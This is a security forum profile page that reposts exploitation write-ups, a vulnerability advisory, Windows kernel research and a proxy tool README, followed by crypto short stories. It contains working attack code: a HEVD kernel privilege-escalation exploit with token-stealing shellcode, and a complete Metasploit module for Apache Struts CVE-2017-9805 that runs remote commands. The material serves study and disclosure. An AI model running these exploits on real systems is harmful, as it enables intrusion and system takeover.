Jump to content

Nytro

Administrators
  • Posts

    18787
  • Joined

  • Last visited

  • Days Won

    738

Everything posted by Nytro

  1. HEVD Stack Overflow GS Posted on September 5, 2017 Lately, I've decided to play around with HackSys Extreme Vulnerable Driver (HEVD) for fun. It's a great way to familiarize yourself with Windows exploitation. In this blog post, I'll show how to exploit the stack overflow that is protected with /GS stack cookies on Windows 7 SP1 32 bit. You can find the source code here. It has a few more exploits written and a Win10 pre-anniversary version of the regular stack buffer overflow vulnerability. Triggering the Vulnerable Function To start, we need to find the ioctl dispatch routine in HEVD. Looking for theIRP_MJ_DEVICE_CONTROL IRP, we see that the dispatch function can be found at hevd+508e. kd> !drvobj hevd 2 Driver object (852b77f0) is for: \Driver\HEVD DriverEntry: 995cb129 HEVD DriverStartIo: 00000000 DriverUnload: 995ca016 HEVD AddDevice: 00000000 Dispatch routines: [00] IRP_MJ_CREATE 995c9ff2 HEVD+0x4ff2 [01] IRP_MJ_CREATE_NAMED_PIPE 995ca064 HEVD+0x5064 ... [0e] IRP_MJ_DEVICE_CONTROL 995ca08e HEVD+0x508e [0f] IRP_MJ_INTERNAL_DEVICE_CONTROL 995ca064 HEVD+0x5064 [10] IRP_MJ_SHUTDOWN 995ca064 HEVD+0x5064 [11] IRP_MJ_LOCK_CONTROL 995ca064 HEVD+0x5064 [12] IRP_MJ_CLEANUP 995ca064 HEVD+0x5064 [13] IRP_MJ_CREATE_MAILSLOT 995ca064 HEVD+0x5064 [14] IRP_MJ_QUERY_SECURITY 995ca064 HEVD+0x5064 [15] IRP_MJ_SET_SECURITY 995ca064 HEVD+0x5064 ... Finding the ioctl request number requires very light reverse engineering. We want to end up eventually at hevd+515a. At hevd+50b4, the request number is subtracted by 222003h. If it was 222003h, then jump to hevd+5172, or else fall through to hevd+50bf. In this basic block, our ioctl request number is subtracted by 4. If the result is 0, we are where we want to be. Therefore, our ioctl number should be 222007h. Eventually, a memcpy is reached where the calling function does not check the copy size. To give the overflow code a quick run, we call it with benign input using the code below. You can find the implementation of mmap and write in the full source code. def trigger_stackoverflow_gs(addr, size): dwReturn = c_ulong() driver_handle = kernel32.CreateFileW(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) if not driver_handle or driver_handle == -1: sys.exit() print "[+] IOCTL: 0x222007" dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x222007, addr, size, None, 0, byref(dwReturn), None) m = mmap() write(m, 'A'*10) trigger_stackoverflow_gs(m, 10) In WinDbg, the debug output confirms that we are calling the right ioctl. From the figure, we can see that the kernel buffer is 0x200 in size so if we run a PoC again, but with 0x250 As, we should overflow the stack cookie and blue screens our VM. Indeed, the bugcheck tells us that the system crashed due to a stack buffer overflow. Stack cookies in Windows are first XORed with ebp before they're stored on the stack. If we take the cookie in the bugcheck, and XOR it with 41414141, the result should resemble a stack address. Specifically, it should be the stack base pointer for hevd+48da. kd> ? e9d25b91 ^ 41414141 Evaluate expression: -1466754352 = a8931ad0 Bypassing Stack Cookies A common way to bypass stack cookies, introduced by David Litchfield, is to cause the program to throw an exception before the stack cookie is checked at the end of the function. This works because when an exception occurs, the stack cookie is not checked. There are two ways [generating an exception] might happen--one we can control and the other is dependent of the code of the vulnerable function. In the latter case, if we overflow other data, for example parameters that were pushed onto the stack to the vulnerable function and these are referenced before the cookie check is performed then we could cause an exception here by setting this data to something that will cause an exception. If the code of the vulnerable function has been written in such a way that no opportunity exists to do this, then we have to attempt to generate our own exception. We can do this by attempting to write beyond the end of the stack. For us, it's easy because the vulnerable function uses memcpy. We can simply force memcpy to segfault by letting it continue copying the source buffer all the way to unmapped memory. I use my mmap function to map two adjacent pages, then munmap to unmap the second page. mmap and munmap are just simple wrappers I wrote for NtAllocateVirtualMemoryand NtFreeVirtualMemory respectively. The idea is to place the source buffer at the end of the mapped page that was mapped, and have the vulnerable memcpy read off into the unmapped page to cause an exception. To test this, we'll use the PoC code below. m = mmap(size=0x2000) munmap(m+0x1000) trigger_stackoverflow_gs(m+0x1000-0x250, 0x251) Back in the debugger, we can observe that an exception was thrown and eip was overwritten as a result of the exception handler being overwritten. The next step is to find the offset of the As so we can control eip to point to shellcode. You can use a binary search type way to find the offset, but an easier method is to use a De Bruijn sequence as the payload. I usually use Metasploit's pattern_create.rb andpattern_offset.rb for finding the exact offset in my buffer. The figure above shows us 41367241 overwrites the exception handler address and so also eip. kd> .formats 41367241 Evaluate expression: Hex: 41367241 Decimal: 1094087233 Octal: 10115471101 Binary: 01000001 00110110 01110010 01000001 Chars: A6rA Time: Wed Sep 1 18:07:13 2004 Float: low 11.4029 high 0 Double: 5.40551e-315 Reversing the order due to endianness, we get Ar6A which pattern_offset.rb tells us is offset 528 (0x210). Therefore, our source buffer will be of size 0x210+4, where the 4 is due to the address of our shellcode. Constructing Shellcode Since there is 0x1000-0x210-4 unused space in our allocated page, we can just put our shellcode in the beginning of the page. I use common Windows token stealing shellcode that basically iterates through the _EPROCESSs, looks for the SYSTEM process, and copies the SYSTEM process' token. Additionally, for convenience in breaking at the shellcode, I prepend the shellcode with a breakpoint (\xcc). \xcc\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00 \x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8 \x00\x00\x00\x89\x91\xf8\x00\x00\x00 Our shellcode still isn't complete yet; the shellcode doesn't know where to return to after it executes. To search for a return address, let's inspect the call stack in the debugger when the shellcode executes. kd> k # ChildEBP RetAddr WARNING: Frame IP not in any known module. Following frames may be wrong. 00 a88cf114 82ab3622 0x1540000 01 a88cf138 82ab35f4 nt!ExecuteHandler2+0x26 02 a88cf15c 82ae73b5 nt!ExecuteHandler+0x24 03 a88cf1f0 82af005c nt!RtlDispatchException+0xb6 04 a88cf77c 82a79dd6 nt!KiDispatchException+0x17c 05 a88cf7e4 82a79d8a nt!CommonDispatchException+0x4a 06 a88cf868 995c9969 nt!KiExceptionExit+0x192 07 a88cf86c a88cf8b4 HEVD+0x4969 08 a88cf870 01540dec 0xa88cf8b4 09 a88cf8b4 41414141 0x1540dec 0a a88cf8b8 41414141 0x41414141 0b a88cf8bc 41414141 0x41414141 ... 51 a88cfad0 995c99ca 0x41414141 52 a88cfae0 995ca16d HEVD+0x49ca 53 a88cfafc 82a72593 HEVD+0x516d 54 a88cfb14 82c6699f nt!IofCallDriver+0x63 hevd+4969 is the instruction address after the memcpy, but we can't return here because the portion of stack the remaining code uses is corrupted. Fixing the stack to the correct values would be extremely annoying. Instead, returning to hevd+49ca which is the return address of the stack frame right below hevd+4969 makes more sense. However, if you adjust the stack and return to hevd+49ca, you'll still get a crash. The problem is at hevd+5260 where edi+0x1c is dereferenced. edi at this point is 0 because registers are XORed with themselves before the exception handler assumes control and neither the program nor our shellcode touched edi. In a normal execution, edi and other registers are restored in __SEH_epilog4. These values are of course restored from the stack. Taking a88cf86c from the stack trace before, we can dump and attempt to find the restore values. They're actually are quite easy to find here because hevd+5dcc is quite easy to spot. hevd+5dcc is the address of the debug print string which is restored into ebx. kd> dds a88cf86c a88cf86c 995c9969 HEVD+0x4969 a88cf870 a88cf8b4 a88cf874 01540dec a88cf878 00000218 a88cf87c 995ca760 HEVD+0x5760 a88cf880 995ca31a HEVD+0x531a a88cf884 00000200 a88cf888 995ca338 HEVD+0x5338 a88cf88c a88cf8b4 a88cf890 995ca3a2 HEVD+0x53a2 a88cf894 00000218 a88cf898 995ca3be HEVD+0x53be a88cf89c 01540dec a88cf8a0 31d15d0b a88cf8a4 8c843f68 <-- edi a88cf8a8 8c843fd8 <-- esi a88cf8ac 995cadcc HEVD+0x5dcc <-- ebx a88cf8b0 455f5359 a88cf8b4 41414141 a88cf8b8 41414141 To obtain the offset of edi, just subtract esp from the current address of the restore value. kd> ? a88cf8a4 - esp Evaluate expression: 1932 = 0000078c kd> dds a88cfad0 la a88cfad0 a88cfae0 a88cfad4 995c99ca HEVD+0x49ca a88cfad8 01540dec a88cfadc 00000218 a88cfae0 a88cfafc a88cfae4 995ca16d HEVD+0x516d a88cfae8 8c843f68 a88cfaec 8c843fd8 a88cfaf0 86c3c398 a88cfaf4 8586f5f0 kd> ? a88cfad0 - esp Evaluate expression: 2488 = 000009b8 Similarly, finding the offset to return to is found by obtaining the difference of a88cfad0and esp. Lastly, our shellcode should pop ebp; ret 8; which results in start: xor eax, eax; mov eax,dword ptr fs:[eax+0x124]; # nt!_KPCR.PcrbData.CurrentThread mov eax,dword ptr [eax+0x50]; # nt!_KTHREAD.ApcState.Process mov ecx,eax; # Store unprivileged _EPROCESS in ecx loop: mov eax,dword ptr [eax+0xb8]; # Next nt!_EPROCESS.ActiveProcessLinks.Flink sub eax, 0xb8; # Back to the beginning of _EPROCESS cmp dword ptr [eax+0xb4],0x04; # SYSTEM process? nt!_EPROCESS.UniqueProcessId jne loop; stealtoken: mov edx,dword ptr [eax+0xf8]; # Get SYSTEM nt!_EPROCESS.Token mov dword ptr [ecx+0xf8],edx; # Copy token restore: mov edi, [esp+0x78c]; # edi irq mov esi, [esp+0x790]; # esi mov ebx, [esp+0x794]; # move print string into ebx add esp, 0x9b8; pop ebp; ret 0x8; Gaining NT Authority\SYSTEM Putting everything together, the final exploit looks like this. m = mmap(size=0x2000) munmap(m+0x1000) size = 0x210+4 sc = '\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x8b\xbc\x24\x8c\x07\x00\x00\x8b\xb4\x24\x90\x07\x00\x00\x8b\x9c\x24\x94\x07\x00\x00\x81\xc4\xb8\x09\x00\x00\x5d\xc2\x08\x00' write(m, sc + 'A'*(0x1000-4-len(sc)) + struct.pack("<I", m)) trigger_stackoverflow_gs(m+0x1000-size, size+1) print '\n[+] Privilege Escalated\n' os.system('cmd.exe') And that should give us: Sursa: https://klue.github.io/blog/2017/09/hevd_stack_gs/
      • 1
      • Like
  2. WSSiP: A WebSocket Manipulation Proxy Short for "WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server. Upstream proxy support also means you can forward HTTP/HTTPS traffic to an intercepting proxy of your choice (e.g. Burp Suite or Pappy Proxy) but view WebSocket traffic in WSSiP. More information can be found on the blog post. There is an outward bridge via HTTP to write a fuzzer in any language you choose to debug and fuzz for security vulnerabilities. See Fuzzing for more details. Written and maintained by Samantha Chalker (@thekettu). Icon for WSSiP release provided by @dragonfoxing. Installation From Packaged Application See Releases. From npm/yarn (for CLI commands) Run the following in your command line: npm: # Install Electron globally npm i -g electron@1.7 # Install wssip global for "wssip" command npm i -g wssip # Launch! wssip yarn: (Make sure the directory in yarn global bin is in your PATH) yarn global add electron@1.7 yarn global add wssip wssip You can also run npm install electron (or yarn add electron) inside the installed WSSiP directory if you do not want to install Electron globally, as the app packager requires Electron be added to developer dependencies. From Source Using a command line: # Clone repository locally git clone https://github.com/nccgroup/wssip # Change to the directory cd wssip # If you are developing for WSSiP: # npm i # If not... (as to minimize disk space): npm i electron@1.7 npm i --production # Start application: npm start Usage Open the WSSiP application. WSSiP will start listening automatically. This will default to localhost on port 8080. Optionally, use Tools > Use Upstream Proxy to use another intercepting proxy to view web traffic. Configure the browser to point to http://localhost:8080/ as the HTTP Proxy. Navigate to a page using WebSockets. A good example is the WS Echo Demonstration. ??? Potato. Fuzzing WSSiP provides an HTTP bridge via the man-in-the-middle proxy for custom applications to help fuzz a connection. These are accessed over the proxy server. A few of the simple CA certificate downloads are: http://mitm/ca.pem / http://mitm/ca.der (Download CA Certificate) http://mitm/ca_pri.pem / http://mitm/ca_pri.der (Download Private Key) http://mitm/ca_pub.pem / http://mitm/ca_pub.der (Download Public Key) Get WebSocket Connection Info Returns whether the WebSocket id is connected to a web server, and if so, return information. URL GET http://mitm/ws/:id URL Params id=[integer] Success Response (Not Connected) Code: 200 Content: {connected: false} Success Response (Connected) Code: 200 Content: {connected: true, url: 'ws://echo.websocket.org', bytesReceived: 0, extensions: {}, readyState: 3, protocol: '', protocolVersion: 13} Send WebSocket Data Send WebSocket data. URL POST http://mitm/ws/:id/:sender/:mode/:type?log=:log URL Params Required: id=[integer] sender one of client or server mode one of message, ping or pong type one of ascii or binary (text is an alias of ascii) Optional: log either true or y to log in the WSSiP application. Errors will be logged in the WSSiP application instead of being returned via the REST API. Data Params Raw data in the POST field will be sent to the WebSocket server. Success Response: Code: 200 Content: {success: true} Error Response: Code: 500 Content: {success: false, reason: 'Error message'} Development Pull requests are welcomed and encouraged. WSSiP supports the debug npm package, and setting the environment variable DEBUG=wssip:* will output debug information to console. There are two commands depending on how you want to compile the Webpack bundle: for development, that is npm run compile:dev and for production is npm run compile. React will also log errors depending on whether development or production is specified. Currently working on: Exposed API for external scripts for fuzzing (99% complete, it is live but need to test more data) Saving/Resuming Connections from File (35% complete, exporting works sans active connections) Using WSSiP in browser without Electron (likely 1.1.0) Rewrite in TypeScript (likely 1.2.0) Using something other than Appbar for Custom/Intercept tabs, and styling the options to center better For information on using the mitmengine class, see: npm, yarn, or mitmengine/README.md Sursa: https://github.com/nccgroup/wssip
      • 2
      • Like
      • Upvote
  3. Omri Misgav September 5, 2017 Windows’ PsSetLoadImageNotifyRoutine Callbacks: the Good, the Bad and the Unclear (Part 1) tl;dr: Security vendors and kernel developers beware – a programming error in the Windows kernel could prevent you from identifying which modules have been loaded at runtime. Introduction During research into the Windows kernel, we came across an interesting issue with PsSetLoadImageNotifyRoutine which as its name implies, notifies of module loading. The thing is, after registering a notification routine for loaded PE images with the kernel the callback may receive invalid image names. After digging into the matter, what started as a seemingly random issue proved to originate from a coding error in the Windows kernel itself. This flaw exists in the most recent Windows 10 release and past versions of the OS, dating back to Windows 2000. The Good: Notification of Module Loading Say you are a security vendor developing a driver, you would like to be aware of every module the system loads. Hooking? Maybe… but there are many security and implementation deficiencies. Here’s where Microsoft introduced PsSetLoadImageNotifyRoutine, in Windows 2000. This mechanism, notifies registered drivers, from various parts in the kernel, when a PE image file has been loaded to virtual memory (kernel\user space). Behind the Scenes: There are several cases that will cause the notification routine to be invoked: Loading drivers Starting new processes Process executable image System DLL: ntdll.dll (2 different binaries for WoW64 processes) Runtime loaded PE images – import table, LoadLibrary, LoadLibraryEx[1], NtMapViewOfSection[2] Figure 1: All calls to PsCallImageNotifyRoutines in ntoskrnl.exe When invoking the registered notification routines, the kernel provides them with a number of parameters in order to properly identify the PE image that is being loaded. These parameters can be seen in the prototype definition of the callback function: VOID (*PLOAD_IMAGE_NOTIFY_ROUTINE)( _In_opt_ PUNICODE_STRING FullImageName, // The image name _In_ HANDLE ProcessId, // A handle to the process the PE has been loaded to _In_ PIMAGE_INFO ImageInfo // Information describing the loaded image (base address, size, kernel/user-mode image, etc) ); The Only Way to Go In essence, this is the only documented method in the WDK to actually monitor PEs that are loaded to memory as executable code. A different method, recommended by Microsoft, is to use a file-system mini-filter callback (IRP_MJ_ACQUIRE_FOR_SECTION_SYNCHRONIZATION). In order to tell that a section object is part of a loaded executable image, one must check for the existence of the SEC_IMAGE flag passed to NtCreateSection. However, the file-system mini-filter callback does not receive this flag, and it is therefore impossible to determine whether the section object is being created for the loading of a PE image or not. The Bad: Wrong Module Parameter The only parameter that can effectively identify the loaded PE file is the FullImageName parameter. However, in each of the scenarios described earlier the kernel uses a different format for FullImageName. At first glance, we noticed that while we do get the full path of the process executable file and constant values for system DLLs (that are missing the volume name), for the rest of the dynamically loaded user-mode PEs the paths provided are missing the volume name. What’s more alarming is that not only does that path come without the volume name, sometimes the path is completely malformed, and could point to a different or non-existing file. RTFM So as every researcher\developer does, the first thing we did was to go back to the documentation and make sure we understood it properly. According to MSDN, the description of FullImageName implies it is the path of the file on disk since it “identifies the executable image file”. There is no mention of these invalid or non-existing paths. The documentation does state that it may be NULL: “(The FullImageName parameter can be NULL in cases in which the operating system is unable to obtain the full name of the image at process creation time.)”. But clearly, if the parameter is not NULL, it means the kernel was able to successfully retrieve the correct image name. There’s More than Just Typos in the Documentation Another thing that caught our attention while perusing the documentation was that the function prototype as shown on MSDN is wrong. The Create parameter, which according to its description doesn’t even seem to be related to this mechanism, doesn’t exist in the function prototype from the WDK. Ironically, using the prototype specified on MSDN causes a crash due to stack corruption. Under the Hood nt!PsCallImageNotifyRoutines is in charge of invoking the registered callbacks. It merely passes along the UNICODE_STRING pointer it receives from its own caller to the callbacks as the FullImageName parameter. When nt!MiMapViewOfImageSection maps a section as an image this UNICODE_STRING is the FileName field of the FILE_OBJECT represented by that section. Figure 2: FullImageName passed to the notification routine is actually the FILE_OBJECT’s FileName field. The FILE_OBJECT is obtained by going through the SECTION -> SEGMENT -> CONTROL_AREA. These are internal and undocumented kernel structures. The Memory Manager creates these structures when mapping a file into memory, and uses these structures internally as long as the file is mapped. Figure 3: nt!MiMapViewOfImageSection obtaining the FILE_OBJECT before calling nt!PsCallImageNotifyRoutines There’s a single SEGMENT structure per mapped image. This means that multiple sections of the same image that exists simultaneously, within the same process or across processes, use the same SEGMENT and CONTROL_AREA. This explains why the argument FullImageName was identical when the same PE file as loaded into different processes at the same time. Figure 4: File mapping internal structures (simplified) RTFM Again In order to understand how the FileName field is set and managed we went back to the documentation and according to MSDN using it is forbidden! “[The value] in this string is valid only during the initial processing of an IRP_MJ_CREATE request. This file name should not be considered valid after the file system starts to process the IRP_MJ_CREATE request” and at this point the FILE_OBJECT is clearly used after the file-system completed the IRP_MJ_CREATE request. Now it’s obvious that the NTFS driver takes ownership of this UNICODE_STRING (FILE_OBJECT.FileName). Using a kernel debugger, we found that ntfs!NtfsUpdateCcbsForLcbMove is the function responsible for the renaming operation. While looking at this function we inferred that during the IRP_MJ_CREATE request the file-system driver simply creates a shallow copy of FILE_OBJECT.FileName and maintains it separately. This means that only the address of the buffer is copied, not the buffer itself. Figure 5: ntfs!NtfsUpdateCcbsForLcbMove updating the file name value Root Cause Analysis As long as the new path length won’t exceed the MaximumLength, the shared buffer will be overwritten without updating the Length field of FILE_OBJECT.FileName, which is where the kernel gets the string for the notification routine. If the new path length exceeds the MaximumLength, a new buffer will be allocated and the notification routine will get a completely outdated value. Even though we finally figured out the cause for this bug something still didn’t add up. Why is it that even after all the handles to the image (from SECTIONs and FILE_OBJECTs) were closed we are still seeing these malformed paths? If all handles to the file were indeed closed, the next time the PE image will be opened and loaded a new FILE_OBJECT should be created without references and with the most up to date path. Instead, the FullImageName still pointed to the old UNICODE_STRING. This proved that the FILE_OBJECT wasn’t closed although its handle count was 0, which means the reference count must have been higher than 0. We were also able to confirm this using a debugger. Bottom Line As a ref count leak in the kernel isn’t very likely we are left with one immediate suspect: The Cache Manager. What seems to be caching behavior, along with the way the file-system driver maintains the file name and a severe coding error is what ultimately causes the invalid name issue. Pausing to reflect At this point we were sure we figured out what causes the problem though what eluded us was how can it be that this bug still exists? And there’s no obvious solution for it? In our next post, we’ll cover our endeavors to find good answers for these questions. ————————————————– [1] Depending on the dwFlags parameter [2] Depending on the dwAllocationAttributes of NtCreateSection Note: majority of the analysis was done on a Windows 7 SP1 x86 fully patched and updated machine. The findings were also verified to be present on Windows XP SP3, Windows 7 SP1 x64, Windows 10 Anniversary Update (Redstone) both x86 and x64 all fully patched and updated as well. Sursa: https://breakingmalware.com/documentation/windows-pssetloadimagenotifyroutine-callbacks-good-bad-unclear-part-1/
      • 1
      • Like
  4. CVE-2017-1000249: file: stack based buffer overflow From: Thomas Jarosch <thomas.jarosch () intra2net com> Date: Tue, 05 Sep 2017 18:24:24 +0200 Hello oss security, file(1) versions 5.29, 5.30 and 5.31 contain a stack based buffer overflow when parsing a specially crafted input file. The issue lets an attacker overwrite a fixed 20 bytes stack buffer with a specially crafted .notes section in an ELF binary file. There are systems like amavisd-new that automatically run file(1) on every email attachment. To prevent an automated exploit by email, another layer of protection like -fstack-protector is needed. Upstream fix: https://github.com/file/file/commit/35c94dc6acc418f1ad7f6241a6680e5327495793 The issue was introduced with this code change in October 2016: https://github.com/file/file/commit/9611f31313a93aa036389c5f3b15eea53510d4d1 file-5.32 has been released including the fix: ftp://ftp.astron.com/pub/file/file-5.32.tar.gz ftp://ftp.astron.com/pub/file/file-5.32.tar.gz.asc [An official release announcement on the file mailinglist will follow once a temporary outage of the mailinglist is solved] The cppcheck tool helped to discover the issue: ---- [readelf.c:514]: (warning) Logical disjunction always evaluates to true: descsz >= 4 || descsz <= 20. ---- Credits: The issue has been found by Thomas Jarosch of Intra2net AG. Code fix and new release provided by Christos Zoulas. Fixed packages from distributions should start to be available soon. Timeline (key entries): 2017-08-26: Notified the maintainer Christos Zoulas 2017-08-27: Christos pushed a fix to CVS / git with innocent looking commit message 2017-08-28: Notified Redhat security team to coordinate release and request CVE ID. Redhat responds it's better to directly contact the distros list instead through them. 2017-09-01: Notified distros mailinglist, asking for CVE ID and requesting embargo until 2017-09-08 2017-09-01: CVE-2017-1000249 ID is assigned 2017-09-04: After discussion that the issue is semi-public already, moved embargo date to 2017-09-05 2017-09-05: Public release Best regards, Thomas Jarosch / Intra2net AG Sursa: http://seclists.org/oss-sec/2017/q3/397
  5. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Apache Struts 2 REST Plugin XStream RCE', 'Description' => %q{ The REST Plugin is using a XStreamHandler with an instance of XStream for deserialization without any type filtering and this can lead to Remote Code Execution when deserializing XML payloads. }, 'Author' => [ 'Man Yue Mo', # Vuln 'caiqiiqi', # PoC 'wvu' # Module ], 'References' => [ ['CVE', '2017-9805'], ['URL', 'https://struts.apache.org/docs/s2-052.html'], ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'], ['URL', 'http://blog.csdn.net/caiqiiqi/article/details/77861477'] ], 'DisclosureDate' => 'Sep 5 2017', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux', 'win'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ ['Apache Struts 2.5 - 2.5.12', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https', 'CMDSTAGER::FLAVOR' => 'wget' }, 'CmdStagerFlavor' => ['wget', 'curl'] )) register_options([ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'Path to Struts app', '/struts2-rest-showcase/orders/3']) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => target_uri.path ) if res && res.code == 200 CheckCode::Detected else CheckCode::Safe end end def exploit execute_cmdstager end def execute_command(cmd, opts = {}) send_request_cgi( 'method' => 'POST', 'uri' => target_uri.path, 'ctype' => 'application/xml', 'data' => xml_payload(cmd) ) end def xml_payload(cmd) # xmllint --format <<EOF <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>/bin/sh</string><string>-c</string><string>#{cmd}</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer/> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map> EOF end end Sursa: https://raw.githubusercontent.com/wvu-r7/metasploit-framework/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rb
      • 2
      • Like
  6. 1. Professor Krankenstein was the most influential genetic engineer of his time. When, in the spring of 2030, he almost incidentally invented the most terrible biological weapon known to humanity it took him about three seconds to realize that should his invention fall into the hands of one of the superpowers -- or into the hands of any common idiot, really -- it could well mean the end of the human race. He wasted no time. He destroyed all the artifacts in the lab. He burned all the notes and hard disks of all the computers they’ve used in the project. He seeded false information all over the place to lead future investigators off the track. Now, left with the last remaining copy of the doomsgerm recipe, he was contemplating whether to destroy it. Yes, destroying it would keep the world safe. But if such a breakthrough in genetic engineering was used in a different way it could have solved the hunger problem by producing enough artificial food to feed the swelling population of Earth. And if global warming went catastrophic, it could have been used to engineer microorganisms super-efficient at sequestering carbon dioxide and methane from atmosphere. In the end he decided not to destroy but rather to encrypt the recipe, put it into a tungsten box, encase the box in concrete and drop it from a cruise ship into Mariana Trench. The story would have ended there if it was not for one Hendrik Koppel, a rather simple-minded person whom professor Krankenstein hired to help him to move the tungsten-concrete box around. Professor didn’t even met him before he destroyed all his doomsgerm research. Still, Hendrik somehow realized that the issue was of interest to superpowers (Was professor Krankenstein sleep-talking?) and sold the information about the location of the box to several governments. By the beginning of October the news hit that an American aircraft carrier is heading in the direction of Mariana Trench. Apparently, there was also a Russian nuclear submarine on its way to the same location. Chinese government have sent a fleet of smaller, more versatile, oceanographic vessels. After the initial bout of despair, professor Krankenstein realised that with his superior knowledge of the position of the box he could possibly get to the location first and destroy the box using an underwater bomb. He used his life savings to buy a rusty old ship called Amor Patrio, manned it with his closest collaborators and set up for Pacific Ocean. ... Things haven't gone well. News reported that Americans and Chinese were approaching the area while Amor Patrio's engine broke and the crew was working around the clock to fix it. Finally, they fixed it and approached Mariana Trench. It was at that point that the news reached them: The box was found by Russians and transported to Moscow. It was now stored in the vault underneath KGB headquarters. There was a whole division of spetsnaz guarding the building. The building itself was filled with special agents, each trained in twelve ways of silently killing a person. Professor Krankenstein and his associated held a meeting on board of Amor Patrio, in the middle of Pacific Ocean. People came up with desperate proposals: Let's dig a tunnel underneath Moscow river. Let's blackmail Russians by re-creating the virus and threatening them to disperse it in Russia. Nuke the entire Moskovskaya Oblast! There was no end to wild and desperate proposals. Once the stream of proposals dried up, everyone looked at professor Krankenstein, awaiting his decision. The silence is almost palpable. Professor Krankenstein slowly took out his iconic pipe and lighted it with the paper which had the decryption key written on it. 13. No full story yet, but let's assume a king is at a quest. At some point he realizes that a small item, say a specific hairpin, is needed to complete the quest. He clearly remembers he used to own the hairpin, but he has no idea whether it's still in his possession and if so, where exactly it is. He sends a messenger home asking his counsellors to look for the hairpin and let him know whether they've found it or not. King's enemies need that information as well so the next day, when the messager is returning, they ambush him and take the message. Unfortunately, the message is encrypted. The messager himself knows nothing about the pin. Many experienced cryptographers are working around the clock for days in row to decrypt the message but to no avail. Finally, a kid wanders into the war room. She asks about what they are doing and after some thinking she says: "I know nothing about the high art of cryptography and in no way I can compare to esteemed savants in this room. What I know, though, is that King's pallace has ten thousand rooms, each full of luxury, pictures and finely carved furniture. To find a hairpin in such a place can take weeks if not months. If there was no hairpin it would take at least that long before they could send the messenger back with negative reply. So, if the messager was captured on his way back on the very next day, it can mean only a single thing: The hairpin was found and your encrypted message says so." 20. Here Legrand, having re-heated the parchment, submitted It my inspection. The following characters were rudely traced, in a red tint, between the death's-head and the goat: 53++!305))6*;4826)4+.)4+);806*;48!8`60))85;]8*:+*8!83(88)5*!; 46(;88*96*?;8)*+(;485);5*!2:*+(;4956*2(5*-4)8`8*; 4069285);)6 !8)4++;1(+9;48081;8:8+1;48!85;4)485!528806*81(+9;48;(88;4(+?3 4;48)4+;161;:188;+?; "But," said I, returning him the slip, "I am as much in the dark as ever. Were all the jewels of Golconda awaiting me on my solution of this enigma, I am quite sure that I should be unable to earn them." "And yet," said Legrand, "the solution is by no means so difficult as you might be led to imagine from the first hasty inspection of the characters. These characters, as any one might readily guess, form a cipher --that is to say, they convey a meaning; but then, from what is known of Kidd, I could not suppose him capable of constructing any of the more abstruse cryptographs. I made up my mind, at once, that this was of a simple species --such, however, as would appear, to the crude intellect of the sailor, absolutely insoluble without the key." "And you really solved it?" "Readily; I have solved others of an abstruseness ten thousand times greater. Circumstances, and a certain bias of mind, have led me to take interest in such riddles, and it may well be doubted whether human ingenuity can construct an enigma of the kind which human ingenuity may not, by proper application, resolve. In fact, having once established connected and legible characters, I scarcely gave a thought to the mere difficulty of developing their import. "In the present case --indeed in all cases of secret writing --the first question regards the language of the cipher; for the principles of solution, so far, especially, as the more simple ciphers are concerned, depend on, and are varied by, the genius of the particular idiom. In general, there is no alternative but experiment (directed by probabilities) of every tongue known to him who attempts the solution, until the true one be attained. But, with the cipher now before us, all difficulty is removed by the signature. The pun on the word 'Kidd' is appreciable in no other language than the English. But for this consideration I should have begun my attempts with the Spanish and French, as the tongues in which a secret of this kind would most naturally have been written by a pirate of the Spanish main. As it was, I 